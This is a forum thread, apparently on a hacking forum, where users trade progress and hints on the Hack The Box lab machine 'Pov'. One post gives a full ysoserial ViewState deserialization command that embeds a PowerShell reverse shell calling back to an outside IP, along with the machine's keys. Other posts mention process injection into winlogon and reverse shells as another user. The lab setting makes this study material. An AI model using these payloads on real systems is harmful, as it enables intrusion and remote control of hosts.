Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
#61
Where did you search and find it? I can find nothing like a hash or a password.

#62
I'm also stuck with the payload...

.\ysoserial.exe --generator="8E0F0FA3"  -p ViewState -g TextFormattingRunProperties -c "New-Object System.Net.Sockets.TCPClient('10.10.x.x',9998);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
#63
I use the https://github.com/decoder-it/psgetsyste...getsys.ps1 script to inject a process into winlogon. However, I get the error code: ERROR_INSUFFICIENT_BUFFER

122 (0x7A)

The data area passed to a system call is too small.

I see the process being created, but it exits immediately.

winlogon does not have enough memory to start cmd.exe? It's super weird.
#64
PS C:\> whoami
pov\alaading
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


no SeDebugPrivilege priv, why is that
#65
(Jan 28, 2024, 02:39 AM)ConnorDev Wrote:
(Jan 28, 2024, 02:36 AM)eclipse Wrote:
PS C:\> whoami
pov\alaading
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


no SeDebugPrivilege priv, why is that

Same here. There is no SeDebugPrivilege

Huh so any hint guys
#66
I can not find a way to become alaading, can someone give me a hint

#67
People, how did you get alaading user?
#68
(Jan 28, 2024, 02:42 AM)query1338 Wrote: I can not find a way to become alaading, can someone give me a hint

Find a credential file and use it to invoke a reverse shell as this user
#69
(Jan 28, 2024, 02:44 AM)eclipse Wrote:
(Jan 28, 2024, 02:42 AM)query1338 Wrote: I can not find a way to become alaading, can someone give me a hint

Find a credential file and use it to invoke a reverse shell as this user

OK, I have an encrypted password but I don't know how I can use it
#70
any hint for root ??

no SeDebugPrivilege priv still...